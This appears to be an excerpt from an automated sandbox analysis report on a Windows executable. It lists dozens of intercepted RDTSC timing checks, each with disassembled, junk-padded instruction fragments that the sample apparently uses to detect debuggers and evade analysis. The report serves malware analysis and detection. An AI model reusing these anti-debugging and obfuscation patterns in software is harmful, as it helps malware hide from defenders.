                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 713571 second address: 713582 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 710812 second address: 710818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 70F847 second address: 70F85D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 713582 second address: 713589 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7127CE second address: 7127D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7136CC second address: 7136FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FED74F3E521h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FED74F3E528h 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 716408 second address: 71640C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 71BF0D second address: 71BF13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 71BF13 second address: 71BF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FED75508878h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FED75508877h 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 push eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 71BF55 second address: 71BF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FED74F3E51Ch 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 71BF68 second address: 71BF6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 71BF6E second address: 71BF74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 71BF74 second address: 71BF79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 71B6C8 second address: 71B6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 71B6CE second address: 71B70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FED75508866h 0x0000000a popad 0x0000000b jmp 00007FED75508870h 0x00000010 pushad 0x00000011 jno 00007FED75508866h 0x00000017 jmp 00007FED75508871h 0x0000001c jl 00007FED75508866h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 71B70C second address: 71B710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 71B710 second address: 71B716 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 71B867 second address: 71B871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 71B871 second address: 71B882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jl 00007FED75508866h 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 71B882 second address: 71B88C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FED74F3E516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 71B88C second address: 71B895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 72080A second address: 72082D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7208F9 second address: 720909 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 720909 second address: 54BAE0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FED74F3E518h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 12D87AABh 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FED74F3E518h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b stc 0x0000002c push dword ptr [ebp+122D0C21h] 0x00000032 jmp 00007FED74F3E51Ah 0x00000037 call dword ptr [ebp+122D244Ah] 0x0000003d pushad 0x0000003e sub dword ptr [ebp+122D1C6Ch], edi 0x00000044 xor eax, eax 0x00000046 mov dword ptr [ebp+122D1C6Ch], ecx 0x0000004c sub dword ptr [ebp+122D1C6Ch], esi 0x00000052 mov edx, dword ptr [esp+28h] 0x00000056 stc 0x00000057 mov dword ptr [ebp+122D36A8h], eax 0x0000005d jmp 00007FED74F3E521h 0x00000062 mov esi, 0000003Ch 0x00000067 stc 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c mov dword ptr [ebp+122D1C56h], ecx 0x00000072 lodsw 0x00000074 ja 00007FED74F3E522h 0x0000007a add eax, dword ptr [esp+24h] 0x0000007e pushad 0x0000007f xor dword ptr [ebp+122D1990h], edi 0x00000085 or ebx, 4FB5547Ch 0x0000008b popad 0x0000008c mov ebx, dword ptr [esp+24h] 0x00000090 clc 0x00000091 push eax 0x00000092 js 00007FED74F3E524h 0x00000098 push eax 0x00000099 push edx 0x0000009a push eax 0x0000009b push edx 0x0000009c rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 727940 second address: 727944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 727944 second address: 72795C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnp 00007FED74F3E516h 0x0000000f jne 00007FED74F3E516h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 726634 second address: 72664B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED75508873h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 727106 second address: 727111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007FED74F3E516h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 727261 second address: 727267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 727267 second address: 727272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 727272 second address: 727278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 72F56B second address: 72F592 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FED74F3E531h 0x0000000c ja 00007FED74F3E516h 0x00000012 jmp 00007FED74F3E525h 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 72F592 second address: 72F5AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED75508877h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 72F5AD second address: 72F5C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jc 00007FED74F3E516h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 72F5C2 second address: 72F5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FED75508868h 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 72F5CF second address: 72F5DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FED74F3E516h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 72F5DA second address: 72F600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FED75508866h 0x0000000d jmp 00007FED75508879h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 72F72E second address: 72F74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 je 00007FED74F3E516h 0x0000000b pop edx 0x0000000c pushad 0x0000000d jmp 00007FED74F3E51Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 72FEDD second address: 72FEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED7550886Bh 0x00000009 pop ecx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7304B7 second address: 7304BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7304BB second address: 7304C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7304C9 second address: 7304D3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED74F3E51Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 734F15 second address: 734F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FED75508866h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 734F1F second address: 734F29 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FED74F3E516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 734F29 second address: 734F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FED75508878h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f pushad 0x00000010 jmp 00007FED75508877h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6B68CD second address: 6B68D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FED74F3E516h 0x0000000a popad 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 733DBC second address: 733DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 733DC0 second address: 733DC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 733DC6 second address: 733DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jbe 00007FED75508866h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6F966B second address: 6F9670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6F97B9 second address: 6F97C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007FED75508866h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6F97C9 second address: 6F97E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jng 00007FED74F3E520h 0x0000000e jmp 00007FED74F3E51Ah 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6F9896 second address: 6F989A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6F9B9F second address: 6F9BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6F9BA3 second address: 54BAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007FED7550886Dh 0x0000000d push dword ptr [ebp+122D0C21h] 0x00000013 jc 00007FED75508866h 0x00000019 mov edx, ecx 0x0000001b call dword ptr [ebp+122D244Ah] 0x00000021 pushad 0x00000022 sub dword ptr [ebp+122D1C6Ch], edi 0x00000028 xor eax, eax 0x0000002a mov dword ptr [ebp+122D1C6Ch], ecx 0x00000030 sub dword ptr [ebp+122D1C6Ch], esi 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a stc 0x0000003b mov dword ptr [ebp+122D36A8h], eax 0x00000041 jmp 00007FED75508871h 0x00000046 mov esi, 0000003Ch 0x0000004b stc 0x0000004c add esi, dword ptr [esp+24h] 0x00000050 mov dword ptr [ebp+122D1C56h], ecx 0x00000056 lodsw 0x00000058 ja 00007FED75508872h 0x0000005e add eax, dword ptr [esp+24h] 0x00000062 pushad 0x00000063 xor dword ptr [ebp+122D1990h], edi 0x00000069 or ebx, 4FB5547Ch 0x0000006f popad 0x00000070 mov ebx, dword ptr [esp+24h] 0x00000074 clc 0x00000075 push eax 0x00000076 js 00007FED75508874h 0x0000007c push eax 0x0000007d push edx 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6F9D31 second address: 6F9D8D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FED74F3E51Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 412A02DAh 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FED74F3E518h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b add ecx, 64617E86h 0x00000031 call 00007FED74F3E519h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FED74F3E528h 0x0000003d rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6F9D8D second address: 6F9DCB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FED75508866h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FED7550886Ah 0x00000013 jmp 00007FED75508878h 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 ja 00007FED75508866h 0x00000026 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6F9DCB second address: 6F9DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6F9DCF second address: 6F9E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FED75508879h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f jmp 00007FED75508878h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jnc 00007FED75508871h 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FA08C second address: 6FA091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FA091 second address: 6FA096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FA7FD second address: 6FA801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FA801 second address: 6FA807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FA807 second address: 6FA80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FA80B second address: 6FA80F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FA80F second address: 6FA824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FED74F3E51Ah 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FAA71 second address: 6FAA77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 6FAA77 second address: 6FAB18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 adc cl, 00000076h 0x0000000c lea eax, dword ptr [ebp+12481459h] 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FED74F3E518h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov edi, dword ptr [ebp+122D3838h] 0x00000032 nop 0x00000033 pushad 0x00000034 jmp 00007FED74F3E522h 0x00000039 jmp 00007FED74F3E529h 0x0000003e popad 0x0000003f push eax 0x00000040 push ebx 0x00000041 jmp 00007FED74F3E524h 0x00000046 pop ebx 0x00000047 nop 0x00000048 mov dword ptr [ebp+122D17D4h], ecx 0x0000004e lea eax, dword ptr [ebp+12481415h] 0x00000054 or dword ptr [ebp+1247462Ah], edi 0x0000005a mov dword ptr [ebp+122D2963h], esi 0x00000060 push eax 0x00000061 jc 00007FED74F3E51Eh 0x00000067 push ecx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7340AE second address: 7340CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FED7550886Ah 0x0000000a pop eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7340CB second address: 7340D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7340D3 second address: 7340DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 73439E second address: 7343BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FED74F3E527h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 7346C4 second address: 7346D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 737D5E second address: 737D64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 737D64 second address: 737D6A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 737D6A second address: 737D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 737D78 second address: 737D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jne 00007FED7550886Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 737D8F second address: 737DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Eh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 737DA1 second address: 737DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 73E97E second address: 73E982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 73D4BC second address: 73D4C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeRDTSC instruction interceptor: First address: 73D4C1 second address: 73D4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E51Ah 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jnp 00007FED74F3E51Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
